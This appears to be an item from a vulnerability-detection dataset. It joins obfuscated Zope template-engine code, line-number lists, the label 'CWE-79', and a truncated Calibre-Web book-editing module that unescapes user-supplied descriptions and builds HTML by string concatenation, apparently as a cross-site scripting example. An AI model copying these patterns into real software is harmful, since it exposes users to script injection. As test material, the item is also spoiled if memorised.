__allow_access_to_unprotected_subobjects__ = True
VAR_23 = VAR_24 = None
VAR_25 = MultiMapping.push
VAR_26 = MultiMapping.pop
class CLASS_6(Context):
def __init__(self, VAR_22, VAR_27):
super().__init__(VAR_22, VAR_27)
self.setContext('repeat', CLASS_5(self.repeat_vars))
self.vars = VAR_42 = VAR_27.copy()
self._vars_stack = [VAR_42]
def FUNC_10(self, VAR_28, VAR_29=None, VAR_30=None, VAR_16=None):
VAR_43 = self.contexts.get('request')
return FUNC_10(
VAR_28, VAR_29=domain, VAR_30=mapping,
VAR_43=context, VAR_16=default)
def FUNC_11(self, VAR_21):
VAR_44 = self.evaluate(VAR_21)
if VAR_44 is self.getDefault():
return VAR_44
return bool(VAR_44)
def FUNC_12(self, VAR_21):
VAR_31 = super().evaluateStructure(VAR_21)
return self._handleText(VAR_31, VAR_21)
def FUNC_13(self, VAR_21):
VAR_31 = self.evaluate(VAR_21)
return self._handleText(VAR_31, VAR_21)
def FUNC_14(self, VAR_31, VAR_21):
if VAR_31 is self.getDefault() or VAR_31 is None:
return VAR_31
if isinstance(VAR_31, str):
return VAR_31
elif isinstance(VAR_31, bytes):
VAR_51 = queryUtility(IUnicodeEncodingConflictResolver)
if VAR_51 is None:
return VAR_31.decode('ascii')
try:
return VAR_51.resolve(
self.contexts.get('context'), VAR_31, VAR_21)
except UnicodeDecodeError as VAR_40:
VAR_1.error("UnicodeDecodeError detected for expression \"%s\"\n"
"Resolver class: %s\n"
"Exception VAR_31: %s\n"
"Template: %s\n"
"Rendered VAR_31: %r" %
(VAR_21, VAR_51.__class__, VAR_40,
self.contexts['template'].absolute_url(1), VAR_31))
raise
else:
return str(VAR_31)
def FUNC_15(self, VAR_32, VAR_33):
return CLASS_7(VAR_32, VAR_33)
def FUNC_16(self, VAR_34, VAR_35):
raise NotImplementedError
class CLASS_7(BaseErrorInfo):
__allow_access_to_unprotected_subobjects__ = True
@implementer(IZopeAwareEngine)
class CLASS_8(Z3Engine):
VAR_36 = CLASS_6
class CLASS_9(Iterator):
__allow_access_to_unprotected_subobjects__ = True
@property
def FUNC_17(self):
return super().index()
@property
def FUNC_18(self):
return super().start()
@property
def FUNC_19(self):
return super().end()
@property
def FUNC_20(self):
return super().item()
def FUNC_21(self, VAR_20=None):
if self.start:
return True
return not self.same_part(VAR_20, self._last_item, self.item)
def FUNC_22(self, VAR_20=None):
if self.end:
return True
return not self.same_part(VAR_20, self.item, self._next)
def FUNC_23(self, VAR_20, VAR_37, VAR_38):
if VAR_20 is None:
return VAR_37 == VAR_38
VAR_45 = VAR_3()
return getattr(VAR_37, VAR_20, VAR_45) == getattr(VAR_38, VAR_20, VAR_45) is not VAR_45
def __next__(self):
if self._nextIndex > 0:
self._last_item = self.item
return super().__next__()
def FUNC_24(self):
if self._nextIndex > 0:
self._last_item = self.item
return super().next()
@implementer(ITraversable)
class CLASS_10(CLASS_9):
def FUNC_25(self, VAR_20, VAR_39):
if VAR_20 in ('first', 'last'):
VAR_48 = getattr(self, VAR_20)
VAR_20 = VAR_39[:]
if not VAR_20:
VAR_20 = None
VAR_39[:] = []
return VAR_48(VAR_20)
return getattr(self, VAR_20)
def FUNC_23(self, VAR_20, VAR_37, VAR_38):
if VAR_20 is None:
return VAR_37 == VAR_38
if isinstance(VAR_20, str):
VAR_20 = VAR_20.split('/')
elif isinstance(VAR_20, bytes):
VAR_20 = VAR_20.split(b'/')
try:
VAR_37 = FUNC_0(VAR_37, VAR_20, None)
VAR_38 = FUNC_0(VAR_38, VAR_20, None)
except VAR_2:
return False
return VAR_37 == VAR_38
class CLASS_11(StringExpr):
def __call__(self, VAR_5):
VAR_46 = []
if isinstance(self._expr, str):
VAR_49 = VAR_5.evaluateText
else:
VAR_49 = VAR_5.evaluate
for var in self._vars:
VAR_50 = VAR_49(var)
VAR_46.append(VAR_50)
return self._expr % tuple(VAR_46)
def FUNC_3(VAR_8=CLASS_3, VAR_9=True):
VAR_40 = CLASS_8()
VAR_40.iteratorFactory = CLASS_10
for pt in VAR_8._default_type_names:
VAR_40.registerType(pt, VAR_8)
VAR_40.registerType('string', CLASS_11)
VAR_40.registerType('python', ZRPythonExpr.PythonExpr)
VAR_40.registerType('not', NotExpr)
VAR_40.registerType('defer', DeferExpr)
VAR_40.registerType('lazy', LazyExpr)
VAR_40.registerType('provider', TALESProviderExpression)
VAR_40.registerBaseName('modules', VAR_0)
VAR_40.untrusted = VAR_9
return VAR_40
def FUNC_4():
VAR_40 = FUNC_3(CLASS_4, VAR_9=False)
VAR_40.types['python'] = PythonExpr
return VAR_40
VAR_10 = FUNC_3()
def FUNC_5():
return VAR_10
VAR_11 = FUNC_4()
def FUNC_6():
return VAR_11
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
14,
18,
21,
47,
51,
52,
54,
56,
57,
58,
59,
60,
61,
63,
64,
67,
75,
78,
85,
92,
93,
96,
104,
113,
114,
122,
124,
125,
136,
137,
140,
145,
152,
153,
156,
157,
159,
160,
161,
162,
163,
167,
168,
170,
173,
178,
179,
180,
181,
184,
192,
196,
199,
200,
202,
203,
204,
214,
215,
219,
220,
223,
231,
234,
235,
237,
240,
241,
243,
244,
247,
253,
256,
257,
258,
259,
263,
270,
277,
279,
281,
283,
285,
287,
289,
290,
291,
292,
293,
294,
298,
312,
313,
315,
317,
318,
320,
323,
328,
329,
334,
335,
336,
337,
338,
339,
340,
343,
345,
346,
348,
349,
350,
352,
353,
354,
355,
356,
357,
358,
359,
363,
367,
371,
375,
376,
377,
382,
387,
393,
394,
399,
404,
405,
410,
414,
415,
419,
423,
437,
438,
440,
444,
452,
453,
468,
469,
471,
472,
473,
477,
478,
480,
481,
484,
485,
487,
488,
491,
13,
14,
15,
16,
17,
66,
67,
68,
69,
70,
71,
95,
96,
97,
98,
99,
100,
116,
117,
118,
139,
140,
141,
142,
222,
223,
224,
225,
226,
227,
228,
331,
332,
408,
409,
265,
266,
267,
272,
273,
274,
322,
323,
324,
325,
326
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
14,
18,
21,
48,
52,
53,
55,
57,
58,
59,
60,
61,
62,
64,
65,
68,
77,
80,
86,
87,
88,
89,
96,
97,
98,
101,
102,
103,
108,
110,
112,
113,
116,
124,
133,
134,
142,
144,
145,
156,
157,
160,
165,
172,
173,
176,
177,
179,
180,
181,
182,
183,
187,
188,
190,
193,
198,
199,
200,
201,
204,
212,
216,
219,
220,
222,
223,
224,
234,
235,
239,
240,
243,
251,
254,
255,
257,
260,
261,
263,
264,
267,
273,
276,
277,
278,
279,
283,
290,
297,
299,
301,
303,
305,
307,
309,
310,
311,
312,
313,
314,
318,
332,
333,
335,
337,
338,
340,
343,
348,
349,
354,
355,
356,
357,
358,
359,
360,
363,
365,
366,
368,
369,
370,
372,
373,
374,
375,
376,
377,
378,
379,
383,
387,
391,
395,
396,
397,
402,
407,
413,
414,
419,
424,
425,
430,
434,
435,
439,
443,
457,
458,
460,
464,
472,
473,
488,
489,
491,
492,
493,
497,
498,
500,
501,
504,
505,
507,
508,
511,
13,
14,
15,
16,
17,
67,
68,
69,
70,
71,
72,
115,
116,
117,
118,
119,
120,
136,
137,
138,
159,
160,
161,
162,
242,
243,
244,
245,
246,
247,
248,
351,
352,
428,
429,
285,
286,
287,
292,
293,
294,
342,
343,
344,
345,
346
] |
1CWE-79
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
from shutil import copyfile
from uuid import uuid4
# Improve this to check if scholarly is available in a global way, like other pythonic libraries
have_scholar = True
try:
from scholarly import scholarly
except ImportError:
have_scholar = False
pass
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, request, flash, redirect, url_for, abort, Markup, Response
from flask_babel import gettext as _
from flask_login import current_user, login_required
from sqlalchemy.exc import OperationalError, IntegrityError
from sqlite3 import OperationalError as sqliteOperationalError
from . import constants, logger, isoLanguages, gdriveutils, uploader, helper
from . import config, get_locale, ub, db
from . import calibre_db
from .services.worker import WorkerThread
from .tasks.upload import TaskUpload
from .render_template import render_title_template
from .usermanagement import login_required_if_no_ano
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
editbook = Blueprint('editbook', __name__)
log = logger.create()
def upload_required(f):
@wraps(f)
def inner(*args, **kwargs):
if current_user.role_upload() or current_user.role_admin():
return f(*args, **kwargs)
abort(403)
return inner
def edit_required(f):
@wraps(f)
def inner(*args, **kwargs):
if current_user.role_edit() or current_user.role_admin():
return f(*args, **kwargs)
abort(403)
return inner
def search_objects_remove(db_book_object, db_type, input_elements):
del_elements = []
for c_elements in db_book_object:
found = False
if db_type == 'languages':
type_elements = c_elements.lang_code
elif db_type == 'custom':
type_elements = c_elements.value
else:
type_elements = c_elements.name
for inp_element in input_elements:
if inp_element.lower() == type_elements.lower():
# if inp_element == type_elements:
found = True
break
# if the element was not found in the new list, add it to remove list
if not found:
del_elements.append(c_elements)
return del_elements
def search_objects_add(db_book_object, db_type, input_elements):
add_elements = []
for inp_element in input_elements:
found = False
for c_elements in db_book_object:
if db_type == 'languages':
type_elements = c_elements.lang_code
elif db_type == 'custom':
type_elements = c_elements.value
else:
type_elements = c_elements.name
if inp_element == type_elements:
found = True
break
if not found:
add_elements.append(inp_element)
return add_elements
def remove_objects(db_book_object, db_session, del_elements):
changed = False
if len(del_elements) > 0:
for del_element in del_elements:
db_book_object.remove(del_element)
changed = True
if len(del_element.books) == 0:
db_session.delete(del_element)
return changed
def add_objects(db_book_object, db_object, db_session, db_type, add_elements):
changed = False
if db_type == 'languages':
db_filter = db_object.lang_code
elif db_type == 'custom':
db_filter = db_object.value
else:
db_filter = db_object.name
for add_element in add_elements:
# check if a element with that name exists
db_element = db_session.query(db_object).filter(db_filter == add_element).first()
# if no element is found add it
# if new_element is None:
if db_type == 'author':
new_element = db_object(add_element, helper.get_sorted_author(add_element.replace('|', ',')), "")
elif db_type == 'series':
new_element = db_object(add_element, add_element)
elif db_type == 'custom':
new_element = db_object(value=add_element)
elif db_type == 'publisher':
new_element = db_object(add_element, None)
else: # db_type should be tag or language
new_element = db_object(add_element)
if db_element is None:
changed = True
db_session.add(new_element)
db_book_object.append(new_element)
else:
db_element = create_objects_for_addition(db_element, add_element, db_type)
changed = True
# add element to book
changed = True
db_book_object.append(db_element)
return changed
def create_objects_for_addition(db_element, add_element, db_type):
if db_type == 'custom':
if db_element.value != add_element:
db_element.value = add_element # ToDo: Before new_element, but this is not plausible
elif db_type == 'languages':
if db_element.lang_code != add_element:
db_element.lang_code = add_element
elif db_type == 'series':
if db_element.name != add_element:
db_element.name = add_element
db_element.sort = add_element
elif db_type == 'author':
if db_element.name != add_element:
db_element.name = add_element
db_element.sort = add_element.replace('|', ',')
elif db_type == 'publisher':
if db_element.name != add_element:
db_element.name = add_element
db_element.sort = None
elif db_element.name != add_element:
db_element.name = add_element
return db_element
# Modifies different Database objects, first check if elements if elements have to be deleted,
# because they are no longer used, than check if elements have to be added to database
def modify_database_object(input_elements, db_book_object, db_object, db_session, db_type):
# passing input_elements not as a list may lead to undesired results
if not isinstance(input_elements, list):
raise TypeError(str(input_elements) + " should be passed as a list")
input_elements = [x for x in input_elements if x != '']
# we have all input element (authors, series, tags) names now
# 1. search for elements to remove
del_elements = search_objects_remove(db_book_object, db_type, input_elements)
# 2. search for elements that need to be added
add_elements = search_objects_add(db_book_object, db_type, input_elements)
# if there are elements to remove, we remove them now
changed = remove_objects(db_book_object, db_session, del_elements)
# if there are elements to add, we add them now!
if len(add_elements) > 0:
changed |= add_objects(db_book_object, db_object, db_session, db_type, add_elements)
return changed
def modify_identifiers(input_identifiers, db_identifiers, db_session):
"""Modify Identifiers to match input information.
input_identifiers is a list of read-to-persist Identifiers objects.
db_identifiers is a list of already persisted list of Identifiers objects."""
changed = False
error = False
input_dict = dict([(identifier.type.lower(), identifier) for identifier in input_identifiers])
if len(input_identifiers) != len(input_dict):
error = True
db_dict = dict([(identifier.type.lower(), identifier) for identifier in db_identifiers ])
# delete db identifiers not present in input or modify them with input val
for identifier_type, identifier in db_dict.items():
if identifier_type not in input_dict.keys():
db_session.delete(identifier)
changed = True
else:
input_identifier = input_dict[identifier_type]
identifier.type = input_identifier.type
identifier.val = input_identifier.val
# add input identifiers not present in db
for identifier_type, identifier in input_dict.items():
if identifier_type not in db_dict.keys():
db_session.add(identifier)
changed = True
return changed, error
@editbook.route("/ajax/delete/<int:book_id>")
@login_required
def delete_book_from_details(book_id):
return Response(delete_book(book_id, "", True), mimetype='application/json')
@editbook.route("/delete/<int:book_id>", defaults={'book_format': ""})
@editbook.route("/delete/<int:book_id>/<string:book_format>")
@login_required
def delete_book_ajax(book_id, book_format):
return delete_book(book_id, book_format, False)
def delete_whole_book(book_id, book):
# delete book from Shelfs, Downloads, Read list
ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == book_id).delete()
ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == book_id).delete()
ub.delete_download(book_id)
ub.session_commit()
# check if only this book links to:
# author, language, series, tags, custom columns
modify_database_object([u''], book.authors, db.Authors, calibre_db.session, 'author')
modify_database_object([u''], book.tags, db.Tags, calibre_db.session, 'tags')
modify_database_object([u''], book.series, db.Series, calibre_db.session, 'series')
modify_database_object([u''], book.languages, db.Languages, calibre_db.session, 'languages')
modify_database_object([u''], book.publishers, db.Publishers, calibre_db.session, 'publishers')
cc = calibre_db.session.query(db.Custom_Columns). \
filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
for c in cc:
cc_string = "custom_column_" + str(c.id)
if not c.is_multiple:
if len(getattr(book, cc_string)) > 0:
if c.datatype == 'bool' or c.datatype == 'integer' or c.datatype == 'float':
del_cc = getattr(book, cc_string)[0]
getattr(book, cc_string).remove(del_cc)
log.debug('remove ' + str(c.id))
calibre_db.session.delete(del_cc)
calibre_db.session.commit()
elif c.datatype == 'rating':
del_cc = getattr(book, cc_string)[0]
getattr(book, cc_string).remove(del_cc)
if len(del_cc.books) == 0:
log.debug('remove ' + str(c.id))
calibre_db.session.delete(del_cc)
calibre_db.session.commit()
else:
del_cc = getattr(book, cc_string)[0]
getattr(book, cc_string).remove(del_cc)
log.debug('remove ' + str(c.id))
calibre_db.session.delete(del_cc)
calibre_db.session.commit()
else:
modify_database_object([u''], getattr(book, cc_string), db.cc_classes[c.id],
calibre_db.session, 'custom')
calibre_db.session.query(db.Books).filter(db.Books.id == book_id).delete()
def render_delete_book_result(book_format, jsonResponse, warning, book_id):
if book_format:
if jsonResponse:
return json.dumps([warning, {"location": url_for("editbook.edit_book", book_id=book_id),
"type": "success",
"format": book_format,
"message": _('Book Format Successfully Deleted')}])
else:
flash(_('Book Format Successfully Deleted'), category="success")
return redirect(url_for('editbook.edit_book', book_id=book_id))
else:
if jsonResponse:
return json.dumps([warning, {"location": url_for('web.index'),
"type": "success",
"format": book_format,
"message": _('Book Successfully Deleted')}])
else:
flash(_('Book Successfully Deleted'), category="success")
return redirect(url_for('web.index'))
def delete_book(book_id, book_format, jsonResponse):
warning = {}
if current_user.role_delete_books():
book = calibre_db.get_book(book_id)
if book:
try:
result, error = helper.delete_book(book, config.config_calibre_dir, book_format=book_format.upper())
if not result:
if jsonResponse:
return json.dumps([{"location": url_for("editbook.edit_book", book_id=book_id),
"type": "danger",
"format": "",
"message": error}])
else:
flash(error, category="error")
return redirect(url_for('editbook.edit_book', book_id=book_id))
if error:
if jsonResponse:
warning = {"location": url_for("editbook.edit_book", book_id=book_id),
"type": "warning",
"format": "",
"message": error}
else:
flash(error, category="warning")
if not book_format:
delete_whole_book(book_id, book)
else:
calibre_db.session.query(db.Data).filter(db.Data.book == book.id).\
filter(db.Data.format == book_format).delete()
calibre_db.session.commit()
except Exception as ex:
log.debug_or_exception(ex)
calibre_db.session.rollback()
if jsonResponse:
return json.dumps([{"location": url_for("editbook.edit_book", book_id=book_id),
"type": "danger",
"format": "",
"message": ex}])
else:
flash(str(ex), category="error")
return redirect(url_for('editbook.edit_book', book_id=book_id))
else:
# book not found
log.error('Book with id "%s" could not be deleted: not found', book_id)
return render_delete_book_result(book_format, jsonResponse, warning, book_id)
def render_edit_book(book_id):
cc = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
book = calibre_db.get_filtered_book(book_id, allow_show_archived=True)
if not book:
flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
for lang in book.languages:
lang.language_name = isoLanguages.get_language_name(get_locale(), lang.lang_code)
book = calibre_db.order_authors(book)
author_names = []
for authr in book.authors:
author_names.append(authr.name.replace('|', ','))
# Option for showing convertbook button
valid_source_formats=list()
allowed_conversion_formats = list()
kepub_possible=None
if config.config_converterpath:
for file in book.data:
if file.format.lower() in constants.EXTENSIONS_CONVERT_FROM:
valid_source_formats.append(file.format.lower())
if config.config_kepubifypath and 'epub' in [file.format.lower() for file in book.data]:
kepub_possible = True
if not config.config_converterpath:
valid_source_formats.append('epub')
# Determine what formats don't already exist
if config.config_converterpath:
allowed_conversion_formats = constants.EXTENSIONS_CONVERT_TO[:]
for file in book.data:
if file.format.lower() in allowed_conversion_formats:
allowed_conversion_formats.remove(file.format.lower())
if kepub_possible:
allowed_conversion_formats.append('kepub')
return render_title_template('book_edit.html', book=book, authors=author_names, cc=cc,
title=_(u"edit metadata"), page="editbook",
conversion_formats=allowed_conversion_formats,
config=config,
source_formats=valid_source_formats)
def edit_book_ratings(to_save, book):
changed = False
if to_save["rating"].strip():
old_rating = False
if len(book.ratings) > 0:
old_rating = book.ratings[0].rating
ratingx2 = int(float(to_save["rating"]) * 2)
if ratingx2 != old_rating:
changed = True
is_rating = calibre_db.session.query(db.Ratings).filter(db.Ratings.rating == ratingx2).first()
if is_rating:
book.ratings.append(is_rating)
else:
new_rating = db.Ratings(rating=ratingx2)
book.ratings.append(new_rating)
if old_rating:
book.ratings.remove(book.ratings[0])
else:
if len(book.ratings) > 0:
book.ratings.remove(book.ratings[0])
changed = True
return changed
def edit_book_tags(tags, book):
input_tags = tags.split(',')
input_tags = list(map(lambda it: it.strip(), input_tags))
# Remove duplicates
input_tags = helper.uniq(input_tags)
return modify_database_object(input_tags, book.tags, db.Tags, calibre_db.session, 'tags')
def edit_book_series(series, book):
input_series = [series.strip()]
input_series = [x for x in input_series if x != '']
return modify_database_object(input_series, book.series, db.Series, calibre_db.session, 'series')
def edit_book_series_index(series_index, book):
# Add default series_index to book
modif_date = False
series_index = series_index or '1'
if not series_index.replace('.', '', 1).isdigit():
flash(_("%(seriesindex)s is not a valid number, skipping", seriesindex=series_index), category="warning")
return False
if book.series_index != series_index:
book.series_index = series_index
modif_date = True
return modif_date
# Handle book comments/description
def edit_book_comments(comments, book):
modif_date = False
if len(book.comments):
if book.comments[0].text != comments:
book.comments[0].text = comments
modif_date = True
else:
if comments:
book.comments.append(db.Comments(text=comments, book=book.id))
modif_date = True
return modif_date
def edit_book_languages(languages, book, upload=False, invalid=None):
input_languages = languages.split(',')
unknown_languages = []
if not upload:
input_l = isoLanguages.get_language_codes(get_locale(), input_languages, unknown_languages)
else:
input_l = isoLanguages.get_valid_language_codes(get_locale(), input_languages, unknown_languages)
for l in unknown_languages:
log.error('%s is not a valid language', l)
if isinstance(invalid, list):
invalid.append(l)
else:
flash(_(u"%(langname)s is not a valid language", langname=l), category="warning")
# ToDo: Not working correct
if upload and len(input_l) == 1:
# If the language of the file is excluded from the users view, it's not imported, to allow the user to view
# the book it's language is set to the filter language
if input_l[0] != current_user.filter_language() and current_user.filter_language() != "all":
input_l[0] = calibre_db.session.query(db.Languages). \
filter(db.Languages.lang_code == current_user.filter_language()).first().lang_code
# Remove duplicates
input_l = helper.uniq(input_l)
return modify_database_object(input_l, book.languages, db.Languages, calibre_db.session, 'languages')
def edit_book_publisher(publishers, book):
changed = False
if publishers:
publisher = publishers.rstrip().strip()
if len(book.publishers) == 0 or (len(book.publishers) > 0 and publisher != book.publishers[0].name):
changed |= modify_database_object([publisher], book.publishers, db.Publishers, calibre_db.session,
'publisher')
elif len(book.publishers):
changed |= modify_database_object([], book.publishers, db.Publishers, calibre_db.session, 'publisher')
return changed
def edit_cc_data_value(book_id, book, c, to_save, cc_db_value, cc_string):
changed = False
if to_save[cc_string] == 'None':
to_save[cc_string] = None
elif c.datatype == 'bool':
to_save[cc_string] = 1 if to_save[cc_string] == 'True' else 0
elif c.datatype == 'comments':
to_save[cc_string] = Markup(to_save[cc_string]).unescape()
elif c.datatype == 'datetime':
try:
to_save[cc_string] = datetime.strptime(to_save[cc_string], "%Y-%m-%d")
except ValueError:
to_save[cc_string] = db.Books.DEFAULT_PUBDATE
if to_save[cc_string] != cc_db_value:
if cc_db_value is not None:
if to_save[cc_string] is not None:
setattr(getattr(book, cc_string)[0], 'value', to_save[cc_string])
changed = True
else:
del_cc = getattr(book, cc_string)[0]
getattr(book, cc_string).remove(del_cc)
calibre_db.session.delete(del_cc)
changed = True
else:
cc_class = db.cc_classes[c.id]
new_cc = cc_class(value=to_save[cc_string], book=book_id)
calibre_db.session.add(new_cc)
changed = True
return changed, to_save
def edit_cc_data_string(book, c, to_save, cc_db_value, cc_string):
changed = False
if c.datatype == 'rating':
to_save[cc_string] = str(int(float(to_save[cc_string]) * 2))
if to_save[cc_string].strip() != cc_db_value:
if cc_db_value is not None:
# remove old cc_val
del_cc = getattr(book, cc_string)[0]
getattr(book, cc_string).remove(del_cc)
if len(del_cc.books) == 0:
calibre_db.session.delete(del_cc)
changed = True
cc_class = db.cc_classes[c.id]
new_cc = calibre_db.session.query(cc_class).filter(
cc_class.value == to_save[cc_string].strip()).first()
# if no cc val is found add it
if new_cc is None:
new_cc = cc_class(value=to_save[cc_string].strip())
calibre_db.session.add(new_cc)
changed = True
calibre_db.session.flush()
new_cc = calibre_db.session.query(cc_class).filter(
cc_class.value == to_save[cc_string].strip()).first()
# add cc value to book
getattr(book, cc_string).append(new_cc)
return changed, to_save
def edit_cc_data(book_id, book, to_save):
changed = False
cc = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
for c in cc:
cc_string = "custom_column_" + str(c.id)
if not c.is_multiple:
if len(getattr(book, cc_string)) > 0:
cc_db_value = getattr(book, cc_string)[0].value
else:
cc_db_value = None
if to_save[cc_string].strip():
if c.datatype in ['int', 'bool', 'float', "datetime", "comments"]:
changed, to_save = edit_cc_data_value(book_id, book, c, to_save, cc_db_value, cc_string)
else:
changed, to_save = edit_cc_data_string(book, c, to_save, cc_db_value, cc_string)
else:
if cc_db_value is not None:
# remove old cc_val
del_cc = getattr(book, cc_string)[0]
getattr(book, cc_string).remove(del_cc)
if not del_cc.books or len(del_cc.books) == 0:
calibre_db.session.delete(del_cc)
changed = True
else:
input_tags = to_save[cc_string].split(',')
input_tags = list(map(lambda it: it.strip(), input_tags))
changed |= modify_database_object(input_tags,
getattr(book, cc_string),
db.cc_classes[c.id],
calibre_db.session,
'custom')
return changed
def upload_single_file(request, book, book_id):
# Check and handle Uploaded file
if 'btn-upload-format' in request.files:
requested_file = request.files['btn-upload-format']
# check for empty request
if requested_file.filename != '':
if not current_user.role_upload():
abort(403)
if '.' in requested_file.filename:
file_ext = requested_file.filename.rsplit('.', 1)[-1].lower()
if file_ext not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
flash(_("File extension '%(ext)s' is not allowed to be uploaded to this server", ext=file_ext),
category="error")
return redirect(url_for('web.show_book', book_id=book.id))
else:
flash(_('File to be uploaded must have an extension'), category="error")
return redirect(url_for('web.show_book', book_id=book.id))
file_name = book.path.rsplit('/', 1)[-1]
filepath = os.path.normpath(os.path.join(config.config_calibre_dir, book.path))
saved_filename = os.path.join(filepath, file_name + '.' + file_ext)
# check if file path exists, otherwise create it, copy file to calibre path and delete temp file
if not os.path.exists(filepath):
try:
os.makedirs(filepath)
except OSError:
flash(_(u"Failed to create path %(path)s (Permission denied).", path=filepath), category="error")
return redirect(url_for('web.show_book', book_id=book.id))
try:
requested_file.save(saved_filename)
except OSError:
flash(_(u"Failed to store file %(file)s.", file=saved_filename), category="error")
return redirect(url_for('web.show_book', book_id=book.id))
file_size = os.path.getsize(saved_filename)
is_format = calibre_db.get_book_format(book_id, file_ext.upper())
# Format entry already exists, no need to update the database
if is_format:
log.warning('Book format %s already existing', file_ext.upper())
else:
try:
db_format = db.Data(book_id, file_ext.upper(), file_size, file_name)
calibre_db.session.add(db_format)
calibre_db.session.commit()
calibre_db.update_title_sort(config)
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
log.error('Database error: %s', e)
flash(_(u"Database error: %(error)s.", error=e), category="error")
return redirect(url_for('web.show_book', book_id=book.id))
# Queue uploader info
uploadText=_(u"File format %(ext)s added to %(book)s", ext=file_ext.upper(), book=book.title)
WorkerThread.add(current_user.name, TaskUpload(
"<a href=\"" + url_for('web.show_book', book_id=book.id) + "\">" + uploadText + "</a>"))
return uploader.process(
saved_filename, *os.path.splitext(requested_file.filename),
rarExecutable=config.config_rarfile_location)
def upload_cover(request, book):
if 'btn-upload-cover' in request.files:
requested_file = request.files['btn-upload-cover']
# check for empty request
if requested_file.filename != '':
if not current_user.role_upload():
abort(403)
ret, message = helper.save_cover(requested_file, book.path)
if ret is True:
return True
else:
flash(message, category="error")
return False
return None
def handle_title_on_edit(book, book_title):
# handle book title
book_title = book_title.rstrip().strip()
if book.title != book_title:
if book_title == '':
book_title = _(u'Unknown')
book.title = book_title
return True
return False
def handle_author_on_edit(book, author_name, update_stored=True):
# handle author(s)
input_authors = author_name.split('&')
input_authors = list(map(lambda it: it.strip().replace(',', '|'), input_authors))
# Remove duplicates in authors list
input_authors = helper.uniq(input_authors)
# we have all author names now
if input_authors == ['']:
input_authors = [_(u'Unknown')] # prevent empty Author
change = modify_database_object(input_authors, book.authors, db.Authors, calibre_db.session, 'author')
# Search for each author if author is in database, if not, author name and sorted author name is generated new
# everything then is assembled for sorted author field in database
sort_authors_list = list()
for inp in input_authors:
stored_author = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
if not stored_author:
stored_author = helper.get_sorted_author(inp)
else:
stored_author = stored_author.sort
sort_authors_list.append(helper.get_sorted_author(stored_author))
sort_authors = ' & '.join(sort_authors_list)
if book.author_sort != sort_authors and update_stored:
book.author_sort = sort_authors
change = True
return input_authors, change
@editbook.route("/admin/book/<int:book_id>", methods=['GET', 'POST'])
@login_required_if_no_ano
@edit_required
def edit_book(book_id):
modif_date = False
# create the function for sorting...
try:
calibre_db.update_title_sort(config)
except sqliteOperationalError as e:
log.debug_or_exception(e)
calibre_db.session.rollback()
# Show form
if request.method != 'POST':
return render_edit_book(book_id)
book = calibre_db.get_filtered_book(book_id, allow_show_archived=True)
# Book not found
if not book:
flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
meta = upload_single_file(request, book, book_id)
if upload_cover(request, book) is True:
book.has_cover = 1
modif_date = True
try:
to_save = request.form.to_dict()
merge_metadata(to_save, meta)
# Update book
edited_books_id = None
# handle book title
title_change = handle_title_on_edit(book, to_save["book_title"])
input_authors, authorchange = handle_author_on_edit(book, to_save["author_name"])
if authorchange or title_change:
edited_books_id = book.id
modif_date = True
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
error = False
if edited_books_id:
error = helper.update_dir_stucture(edited_books_id, config.config_calibre_dir, input_authors[0])
if not error:
if "cover_url" in to_save:
if to_save["cover_url"]:
if not current_user.role_upload():
return "", (403)
if to_save["cover_url"].endswith('/static/generic_cover.jpg'):
book.has_cover = 0
else:
result, error = helper.save_cover_from_url(to_save["cover_url"], book.path)
if result is True:
book.has_cover = 1
modif_date = True
else:
flash(error, category="error")
# Add default series_index to book
modif_date |= edit_book_series_index(to_save["series_index"], book)
# Handle book comments/description
modif_date |= edit_book_comments(Markup(to_save['description']).unescape(), book)
# Handle identifiers
input_identifiers = identifier_list(to_save, book)
modification, warning = modify_identifiers(input_identifiers, book.identifiers, calibre_db.session)
if warning:
flash(_("Identifiers are not Case Sensitive, Overwriting Old Identifier"), category="warning")
modif_date |= modification
# Handle book tags
modif_date |= edit_book_tags(to_save['tags'], book)
# Handle book series
modif_date |= edit_book_series(to_save["series"], book)
# handle book publisher
modif_date |= edit_book_publisher(to_save['publisher'], book)
# handle book languages
modif_date |= edit_book_languages(to_save['languages'], book)
# handle book ratings
modif_date |= edit_book_ratings(to_save, book)
# handle cc data
modif_date |= edit_cc_data(book_id, book, to_save)
if to_save["pubdate"]:
try:
book.pubdate = datetime.strptime(to_save["pubdate"], "%Y-%m-%d")
except ValueError:
book.pubdate = db.Books.DEFAULT_PUBDATE
else:
book.pubdate = db.Books.DEFAULT_PUBDATE
if modif_date:
